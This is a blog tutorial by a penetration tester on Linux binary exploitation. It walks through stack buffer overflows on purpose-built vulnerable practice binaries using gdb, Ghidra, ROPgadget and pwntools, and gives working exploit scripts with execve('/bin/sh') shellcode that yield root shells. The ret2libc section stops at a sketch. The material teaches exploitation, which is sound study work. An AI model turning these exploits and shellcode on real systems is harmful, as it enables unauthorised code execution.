Roman Hergenreder

IT-Security Consultant / Penetration Tester

Linux Binary Exploitation

This article is a short introduction to Linux binary exploitation. It covers different types and methods and includes a guide using Python and pwntools. Last modified: 2022-09-06 09:29:51

Table of Contents

  1. Introduction
  2. Installing Requirements
  3. Binary #1: Pwning the Stack
    1. Analyzing the binary
    2. Writing an exploit
  4. Binary #2: Needing more space
  5. Binary #3: ret2libc

Introduction

Binary exploitation is a big topic. It is not a trivial task, and succeeding with it against modern software is unlikely.
Firstly, most software runs in some kind of virtual machine (JVM) or interpreter (Python, PHP, …), which usually rules out these attacks unless the runtime itself is vulnerable.
Secondly, modern compilers and operating systems make it really hard to exploit a bug, if one occurs at all, using mitigations like ASLR, stack canaries and non-executable memory regions. Still, diving into the topic is a good opportunity to learn how binaries and operating systems work, including memory management, registers, the stack, the heap and more.

Installing Requirements

To deal with the topic, we first need some tools for disassembling, debugging and interacting with the binary. There are many disassemblers, but the most commonly used are IDA, Ghidra and Radare. I mostly use IDA and Ghidra. Both have advantages and disadvantages: IDA comes with debugging support and a graphical memory view, whereas Ghidra is, in my opinion, more user-friendly when analysing the code. For debugging, I recommend using gdb with a plugin like gef (GDB Enhanced Features). It should also come with the important checksec feature; if not, checksec can be downloaded separately. The exploits I will show are written in Python using the pwntools library, which bundles many features like packing and unpacking bytes and numbers, assembling and disassembling instructions and crafting ROP chains. If you want to craft the exploits by hand, or just want to check what's available, I also recommend ROPgadget.

Binary #1: Pwning the Stack

The first binary teaches us how to exploit a buffer overflow by putting code on the stack and executing it. This attack is very unlikely to work in the wild, as it requires an executable stack and disabled stack canaries.
The gcc flags would be: -Wl,-z,execstack -fno-stack-protector -no-pie
Download Binary #1
First, we check what kind of file we have using the file and checksec commands:
$ file stack_exec
stack_exec: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7e64cae54d2fdf0456e3fb4997db8a24d1967a06, for GNU/Linux 3.2.0, not stripped
$ checksec stack_exec
[*] '/binary-exploitation/stack_exec'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
Let's look at all the values step by step. First, our file is an ELF file. ELF stands for Executable and Linkable Format and is the most common format for executables and shared libraries (.so files) on Linux and other Unix-like systems. Next, we see that the binary is a 64-bit LSB shared object, which affects the addressing, the registers and the stack word size: 64-bit binaries usually have an address and word size of 8 bytes (64 bits), 32-bit binaries 4 bytes. When working with the stack using operations like push and pop, we will see that the values are always 8 or 4 bytes wide, respectively. LSB stands for Least Significant Byte (sometimes Bit, depending on the context) and means that the binary is little-endian: multi-byte values such as addresses are stored in memory with the least significant byte first, so their byte representation appears reversed. The bytes FF 00 00 00 therefore represent the value 0x000000FF (255 in decimal) and not 0xFF000000 (4278190080), which would be the MSB (big-endian) interpretation. The next property is dynamically linked: external code is loaded at runtime from shared object files (dynamically) instead of being contained in the binary itself (statically linked). We will see later how that works. The last important piece of information from the file command is that the binary is not stripped, which basically means that symbols such as the names of global variables and functions have not been removed.
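The byte order is easiest to see with a few lines of Python. The following is a minimal sketch using only the standard library; the variable names are chosen for illustration, and 0x401136 is simply used as an example address.

```python
import struct

raw = bytes([0xFF, 0x00, 0x00, 0x00])  # four bytes as they sit in memory

# Little-endian (LSB first): the first byte is the least significant one.
little = int.from_bytes(raw, "little")
# Big-endian (MSB first): the first byte is the most significant one.
big = int.from_bytes(raw, "big")

print(little)  # 255
print(big)     # 4278190080

# Packing a 64-bit address for a little-endian target reverses its bytes.
packed = struct.pack("<Q", 0x401136)
print(packed.hex())  # 3611400000000000
```

This is the same conversion that a helper like p64 from pwntools performs when an address is written into a payload.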
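The checksec command shows us the security properties of the binary. A short explanation of every line:
  • Arch: the target architecture, here 64-bit x86 with little-endian byte order
  • RELRO: Relocation Read-Only. With partial RELRO, the GOT entries of lazily bound functions remain writable
  • Stack: whether stack canaries are used to detect an overwritten return address, here they are not
  • NX: whether writable memory such as the stack is marked as non-executable, here it is disabled, so the stack is executable
  • PIE: whether the binary is a position-independent executable. It is not, so it is always loaded at the base address 0x400000
  • RWX: whether there are segments which are readable, writable and executable at the same time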
So for our binary, it's an easy game, as there are no stack canaries, the stack is executable and the addresses of the binary are not randomized. Let's load the binary into Ghidra. On the top left, we see the Symbol Tree with its Exports. There we usually find the _start function, which is a kind of wrapper that calls the actual main function we programmed. The function looks like this:
void _start(undefined8 param_1,undefined8 param_2,undefined8 param_3) {
  undefined8 in_stack_00000000;
  undefined auStack8 [8];
  
  __libc_start_main(main,in_stack_00000000,&stack0x00000008,__libc_csu_init,__libc_csu_fini,param_3,
  auStack8);
  do {
    /* WARNING: Do nothing block with infinite loop */
  } while( true );
}
All we need to know is that the first argument passed to __libc_start_main is a pointer to our main function. Double-clicking it leads us to the important part:
undefined8 main(void)
{
  char local_78 [112];
  
  fwrite("Tell me your name: ",1,0x13,stdout);
  fgets(local_78,1000,stdin);
  return 0;
}
We can see that a buffer of 112 bytes is allocated first (it is placed on the stack). After a message is printed, the code reads up to 1000 bytes (999 characters plus the terminating null byte) from standard input (stdin) into the allocated buffer and then simply returns. We can see directly that it's possible to read more bytes than the buffer can hold. In fact, I compiled the binary with a buffer of 100 bytes, but as the buffer is placed on the stack, it has to satisfy an alignment, which is usually set by the compiler flag -mpreferred-stack-boundary, which defaults to 4 (2^4 = 16 bytes). The 100 bytes are therefore rounded up to the next multiple of 16, which is 112.
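The rounding can be reproduced with a small calculation. This is only a sketch of the arithmetic; the helper name round_up is made up for illustration, and a real compiler takes more factors into account when laying out a stack frame.

```python
def round_up(size: int, alignment: int) -> int:
    """Round size up to the next multiple of alignment."""
    return (size + alignment - 1) // alignment * alignment

boundary = 2 ** 4  # -mpreferred-stack-boundary=4 means 2^4 = 16 bytes
frame_size = round_up(100, boundary)
print(frame_size, hex(frame_size))  # 112 0x70
```

The result 0x70 matches the sub rsp,0x70 instruction in the disassembly of main.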
To exploit the fact that the input buffer is too small for the fgets call, we first need to understand what happens on the stack. Therefore, we open our binary in gdb and set a breakpoint before and after the fgets call, as shown below:
$ gdb stack_exec
Reading symbols from stack_exec...
gef ▸ disassemble main
Dump of assembler code for function main:
0x0000000000401138 <+0>: push rbp
0x0000000000401139 <+1>: mov rbp,rsp
0x000000000040113c <+4>: sub rsp,0x70
0x0000000000401140 <+8>: mov rax,QWORD PTR [rip+0x2ef9] # 0x404040 <stdout@@GLIBC_2.2.5>
0x0000000000401147 <+15>: mov rcx,rax
0x000000000040114a <+18>: mov edx,0x13
0x000000000040114f <+23>: mov esi,0x1
0x0000000000401154 <+28>: lea rdi,[rip+0xea9] # 0x402004
0x000000000040115b <+35>: call 0x401040 <fwrite@plt>
0x0000000000401160 <+40>: mov rdx,QWORD PTR [rip+0x2ee9] # 0x404050 <stdin@@GLIBC_2.2.5>
0x0000000000401167 <+47>: lea rax,[rbp-0x70]
0x000000000040116b <+51>: mov esi,0x3e8
0x0000000000401170 <+56>: mov rdi,rax
0x0000000000401173 <+59>: call 0x401030 <fgets@plt>
0x0000000000401178 <+64>: mov eax,0x0
0x000000000040117d <+69>: leave
0x000000000040117e <+70>: ret
End of assembler dump.
gef ▸ b *main+56
Breakpoint 1 at 0x401170
gef ▸ b *main+64
Breakpoint 2 at 0x401178
Next we will run the program and print the stack at the first breakpoint:
$ gdb stack_exec
(...)
gef ▸ gef config context.nb_lines_stack 16
gef ▸ run
gef ▸ context stack
0x00007fffffffe3b0│+0x0000: 0x0000000000000000 ← $rax, $rsp
0x00007fffffffe3b8│+0x0008: 0x0000000000001000
0x00007fffffffe3c0│+0x0010: 0x0000000000400040 → (bad)
0x00007fffffffe3c8│+0x0018: 0x000000000000000b
0x00007fffffffe3d0│+0x0020: 0x00007fffffffe440 → 0x0000000000401138 → <main+0> push rbp
0x00007fffffffe3d8│+0x0028: 0x00007fffffffe859 → 0x000034365f363878 ("x86_64"?)
0x00007fffffffe3e0│+0x0030: 0x00007ffff7fd43f0 → <dl_main+0> endbr64
0x00007fffffffe3e8│+0x0038: 0x00000000004011cd → <__libc_csu_init+77> add rbx, 0x1
0x00007fffffffe3f0│+0x0040: 0x0000000000000000
0x00007fffffffe3f8│+0x0048: 0x0000000000000000
0x00007fffffffe400│+0x0050: 0x0000000000401180 → <__libc_csu_init+0> endbr64
0x00007fffffffe408│+0x0058: 0x0000000000401050 → <_start+0> endbr64
0x00007fffffffe410│+0x0060: 0x00007fffffffe510 → 0x0000000000000001
0x00007fffffffe418│+0x0068: 0x0000000000000000
0x00007fffffffe420│+0x0070: 0x0000000000401180 → <__libc_csu_init+0> endbr64 ← $rbp
0x00007fffffffe428│+0x0078: 0x00007ffff7db9002 → <__libc_start_main+242> mov edi, eax
This looks a bit complicated at first sight. The stack grows towards lower addresses, which means that values pushed earlier have a higher address. We can ignore most of the values here anyway, but we can see that the rax and rsp registers point to the first address shown. We know that this is the start address of our buffer, as the address was previously loaded into the register using lea rax,[rbp-0x70]. As only 0x70 (112) bytes were allocated on the stack using sub rsp,0x70, we can also conclude that the saved base pointer of the previous stack frame (rbp) and the return address are stored directly behind the buffer, at the next higher addresses. The visualization of the stack should make it a bit clearer.

So the important addresses for us are:
  • 0x00007fffffffe3b0: Beginning of the buffer
  • 0x00007fffffffe420: saved rbp
  • 0x00007fffffffe428: return address
[Stack Visualization]
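The distances between these three addresses give the padding needed later. A minimal sketch of the arithmetic, using the addresses from the gdb session above (they will differ on other systems):

```python
buffer_start = 0x00007fffffffe3b0
saved_rbp = 0x00007fffffffe420
return_addr = 0x00007fffffffe428

# Number of bytes to write before reaching each saved value.
offset_to_rbp = saved_rbp - buffer_start
offset_to_ret = return_addr - buffer_start

print(offset_to_rbp)  # 112
print(offset_to_ret)  # 120
```

So 112 bytes fill the buffer, the next 8 bytes overwrite the saved rbp, and the 8 bytes after that overwrite the return address.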
Our goal is now to take control of the instruction pointer (IP) by overwriting the return address. We can see that the program crashes if we type in 112 + 8 + 8 characters. Looking at the debugger again, we see how the stack changes:
$ gdb stack_exec
(...)
gef ▸ continue
Tell me your name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
gef ▸ context stack
0x00007fffffffe3b0│+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" ← $rax, $rsp, $r8
0x00007fffffffe3b8│+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3c0│+0x0010: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3c8│+0x0018: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3d0│+0x0020: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3d8│+0x0028: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3e0│+0x0030: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3e8│+0x0038: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3f0│+0x0040: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3f8│+0x0048: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe400│+0x0050: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
0x00007fffffffe408│+0x0058: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
0x00007fffffffe410│+0x0060: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
0x00007fffffffe418│+0x0068: "AAAAAAAAAAAAAAAAAAAAAAAA\n"
0x00007fffffffe420│+0x0070: "AAAAAAAAAAAAAAAA\n" ← $rbp
0x00007fffffffe428│+0x0078: "AAAAAAAA\n"
gef ▸ continue
Program received signal SIGSEGV, Segmentation fault.
gef ▸ i reg $rbp
rbp 0x4141414141414141 0x4141414141414141
gef ▸ i reg $rip
rip 0x40117e 0x40117e <main+70>
We can see that the rbp register has been overwritten and that the program tried to return to the address on the stack. That address (0x4141414141414141) is invalid, which produces a segmentation fault. rip still points to the ret instruction because the address is not canonical, so the fault is raised by ret itself. Using the values above, we now have the correct padding to overwrite the return address and can start writing our exploit. As we know the stack is executable, our idea is to put shellcode on the stack and then jump into the stack. To achieve this, we need ROP gadgets. ROP gadgets are short instruction sequences already present in the binary which can be chained to craft a certain sequence of calls. They usually have the form pop <reg>; ret. We can get a list of ROP gadgets using the ROPgadget tool:
$ ROPgadget --binary stack_exec --all | grep "jmp rsp"
0x0000000000401136 : jmp rsp
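To get a feeling for what such a search does, here is a naive sketch that looks for the two-byte encoding of jmp rsp (ff e4) in a byte string. It is not how ROPgadget works internally, the helper find_all is made up for illustration, and the sample bytes are synthetic rather than taken from the real binary.

```python
JMP_RSP = b"\xff\xe4"  # machine code for `jmp rsp` on x86-64

def find_all(data: bytes, needle: bytes) -> list:
    """Return every offset at which needle occurs in data."""
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets

# Synthetic example bytes, not taken from the real binary.
sample = b"\x90\x90\xff\xe4\xc3\x55\x48\x89\xe5\xff\xe4"
print(find_all(sample, JMP_RSP))  # [2, 9]
```

On a real ELF file, such a search yields file offsets that still have to be translated into virtual addresses of executable segments, which is one of the things ROPgadget takes care of.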
If we put the address 0x0000000000401136 on the stack as the return address, the program first jumps to our ROP gadget and then jumps to the address stored in the rsp register. After the ret instruction has popped the return address from the stack, rsp points to the value right behind the return address. Therefore, our shellcode needs to be placed directly after the return address. We can take working shellcode from the shellcode page of the Exploit Database. After searching for Linux/x86_64 - execve(/bin/sh), we find a suitable shellcode. Now we will begin writing actual code. First we create a pwn template and then replace all the code between io = start() and io.interactive():
[Stack Visualization]
$ pwn template stack_exec > exploit.py
Now we simply craft the buffer and spawn an interactive shell:
io = start()
buffer = b""
buffer += b"A" * (112+8)        # PADDING
buffer += p64(0x0000000000401136) # JMP RSP
buffer += b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05" # SHELLCODE
io.sendline(buffer)
io.interactive()
Executing the exploit, we will get a shell:
$ python exploit.py
[+] Starting local process '/challenge/stack_exec': pid 24147
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
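The layout of this payload can be double-checked without pwntools. The following sketch rebuilds the same bytes with the standard library only; the constant names are chosen for illustration, and struct.pack("<Q", ...) stands in for p64.

```python
import struct

PADDING = 112 + 8   # buffer plus saved rbp
JMP_RSP = 0x401136  # gadget address reported by ROPgadget above
SHELLCODE = (
    b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
    b"\x57\x54\x5f\xb0\x3b\x99\x0f\x05"
)

payload = b"A" * PADDING
payload += struct.pack("<Q", JMP_RSP)  # overwrites the return address
payload += SHELLCODE                   # rsp points here after ret

print(len(SHELLCODE))            # 22
print(len(payload))              # 150
print(payload[120:128].hex())    # 3611400000000000

# fgets stops at a newline, so the payload must not contain one,
# and it has to fit into the 999 bytes that fgets accepts.
assert b"\n" not in payload
assert len(payload) <= 999
```

Null bytes are not a problem here, because fgets only stops at a newline or at the end of the input.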
Pwning this binary was of course pretty easy. The following binaries will get progressively more complicated.

Binary #2: Needing more space

Download Binary #2
$ checksec stack_exec_2
[*] '/challenge/stack_exec_2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
This binary is a bit more complex. We still have an executable stack, but this time the address space is randomized. Fortunately, when looking at the disassembly, we can see that the address of the buffer is leaked. Using this address, it's possible to determine the base pointer and thus to calculate the location of the buffer in memory. In addition, the fgets call reads at most 0x2b (43) bytes including the terminating null byte, i.e. 42 bytes of input, and the local buffer is only 20 bytes big.
undefined8 main(void) {
  char acStack28 [20];
  fwrite("Tell me your name: ",1,0x13,stdout);
  fgets(acStack28,0x2b,stdin);
  return 0;
}
The basic idea is now the following: as the receive buffer is only 20 bytes big, which is not enough for our shellcode, and we only have 6 bytes after the return address, we will write code that receives more data, which is then executed. To achieve this, we overwrite the return address with the jmp rsp gadget again and append assembler code that subtracts from the rsp register and jumps to it again, so that execution continues at the beginning of the buffer. There, we make a syscall to receive more data, which is placed right after the instructions, so it is executed immediately without needing to jump anywhere. To find the syscall number and arguments, we use a Linux syscall table. Because we have a 64-bit binary, we have to set the registers according to the table (instead of pushing the values onto the stack as for 32-bit binaries) and then execute the syscall instruction.
[Stack Visualization]
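The space constraints of this plan can be checked with a short calculation. The sketch below derives the available bytes from the decompiled main and compares them with one possible pair of instruction sequences. The byte encodings are the ones an x86-64 assembler commonly emits for these instructions; the output of a particular assembler, including asm() from pwntools, may differ, so treat the lengths as an assumption to verify.

```python
FGETS_SIZE = 0x2b            # second argument of fgets in the decompiled main
max_input = FGETS_SIZE - 1   # fgets reserves one byte for the terminating NUL
padding = 20 + 8             # local buffer plus saved rbp
ret_size = 8                 # the overwritten return address

space_after_ret = max_input - padding - ret_size
rsp_offset_after_ret = padding + ret_size  # rsp relative to the buffer start
print(padding, space_after_ret, rsp_offset_after_ret)  # 28 6 36

# First stage, placed at the start of the buffer: read(0, buffer + 22, 100)
stage1 = bytes.fromhex(
    "4831c0"          # xor rax, rax  (syscall number 0 = read)
    "4831ff"          # xor rdi, rdi  (fd 0 = stdin)
    "4889e6"          # mov rsi, rsp
    "4883c616"        # add rsi, 22
    "48c7c264000000"  # mov rdx, 100
    "0f05"            # syscall
)
# Trampoline, placed after the return address: jump back to the buffer start
trampoline = bytes.fromhex(
    "4883ec24"        # sub rsp, 36
    "ffe4"            # jmp rsp
)
print(len(stage1), len(trampoline))  # 22 6
```

The first stage fits into the 28 bytes before the return address, and the trampoline uses exactly the 6 bytes after it. Because the first stage is 22 bytes long, a destination of buffer + 22 makes the received data land directly behind the syscall instruction.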
After creating the pwn template again, we need to search for our desired ROP gadget. The jmp rsp gadget is located at 0x00000000004011ab. Now we need some code that reads more input, this time using the read syscall, and place it on the stack. The complete payload now looks like this:
io = start()
padding = 28 # 20 byte buffer + 8 byte saved rbp
# read syscall: rax = 0, fd = 0 (stdin), destination = buffer + 22, count = 100
buf = b""
buf += asm("xor rax, rax; xor rdi, rdi; mov rsi, rsp; add rsi, 22; mov rdx, 100; syscall")
buf += b"A" * (padding - len(buf))
buf += p64(0x00000000004011ab) # jmp rsp
buf += asm("sub rsp, 36; jmp rsp") # rsp = buffer
io.send(buf) # exactly 42 bytes, no newline
io.sendline(b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05") # SHELLCODE, received by the read syscall
io.interactive()
And the payload is indeed working:
$ python exploit.py
[+] Starting local process '/challenge/stack_exec_2': pid 69964
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)

Binary #3: ret2libc

Download Binary #3
$ checksec ret2libc
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
undefined8 main(void) {
  char local_28 [32];
  fwrite("Tell me your name: ",1,0x13,stdout);
  fgets(local_28,0x80,stdin);
  return 0;
}

This time the exploitation gets a bit more complicated: the stack and other writable segments are not executable, so we are not able to place shellcode or other instructions on the stack and execute them. Now we will make use of real ROP chains.
First we need to find out which libc version is used.
[Stack Visualisation]
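To give an idea of where this is heading, the following sketch shows the general shape of a ret2libc chain that calls system("/bin/sh"). All three addresses are hypothetical placeholders: the real values depend on the binary and on the libc version and load address, which is why the libc has to be identified first. The padding assumes that local_28 sits 0x28 bytes below the return address, as the Ghidra name suggests.

```python
import struct

def p64(value: int) -> bytes:
    """Pack an integer as a little-endian 64-bit value."""
    return struct.pack("<Q", value)

# Hypothetical placeholder addresses, not taken from the real binary or libc.
POP_RDI_RET = 0x401233     # gadget: pop rdi; ret
BIN_SH = 0x7ffff7f5a5aa    # address of the string "/bin/sh" inside libc
SYSTEM = 0x7ffff7e12290    # address of system() inside libc

PADDING = 32 + 8           # local_28 buffer plus saved rbp

chain = b"A" * PADDING
chain += p64(POP_RDI_RET)  # return into the gadget
chain += p64(BIN_SH)       # popped into rdi, the first argument
chain += p64(SYSTEM)       # the gadget's ret continues in system()

print(len(chain))  # 64
```

The chain stays below the 0x80 bytes that fgets accepts. In practice, an additional ret gadget is sometimes needed in front of the call to keep the stack 16-byte aligned.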